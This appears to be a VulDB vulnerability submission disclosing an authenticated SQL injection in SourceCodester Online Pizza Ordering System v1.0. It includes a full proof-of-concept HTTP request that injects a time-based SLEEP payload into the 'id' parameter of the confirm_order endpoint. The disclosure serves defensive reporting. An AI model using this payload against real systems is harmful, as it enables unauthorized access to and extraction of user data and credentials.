| Titre | SourceCodester Online Pizza Ordering System SQL Injection via 'confirm_order' |
|---|
| Description | Affected Software:
SourceCodester Online Pizza Ordering System v1.0
https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html#comment-103391
Tested On:
Ubuntu Server 22.04.3 LTS
Affected URL:
http://x.x.x.x/php-opos/admin/ajax.php?action=confirm_order
Request:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1
Affected Parameter:
id
Proof of Concept:
POST /php-opos/admin/ajax.php?action=confirm_order HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 5
Origin: http://x.x.x.x
Connection: close
Referer: http://x.x.x.x/php-opos/admin/index.php?page=orders
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxx
id=1 AND (SELECT 5605 FROM (SELECT(SLEEP(15)))UTXE)
Impact:
SQL injection vulnerability can result in unauthorized access to restricted data such as user information and credentials.
Summary:
An authenticated remote SQL injection vulnerability exists in the SourceCodester Online Pizza Ordering System v1.0. The vulnerability is present in a POST request to the /admin/ajax.php?action=confirm_order page via the 'view order' functionality in /admin/index.php?page=orders. Due to improper input sanitization, a specially crafted packet that manipulates the 'id' parameter in the POST request leads to an SQL injection vulnerability, allowing malicious actors to view restricted data and extract the underlying database.
|
|---|
| Utilisateur | simon.davis8080 (UID 54983) |
|---|
| Soumission | 05/10/2023 10:30 (il y a 3 ans) |
|---|
| Modérer | 05/10/2023 12:01 (2 hours later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 241384 [SourceCodester Online Pizza Ordering System 1.0 ajax.php?action=confirm_order ID injection SQL] |
|---|
| Points | 17 |
|---|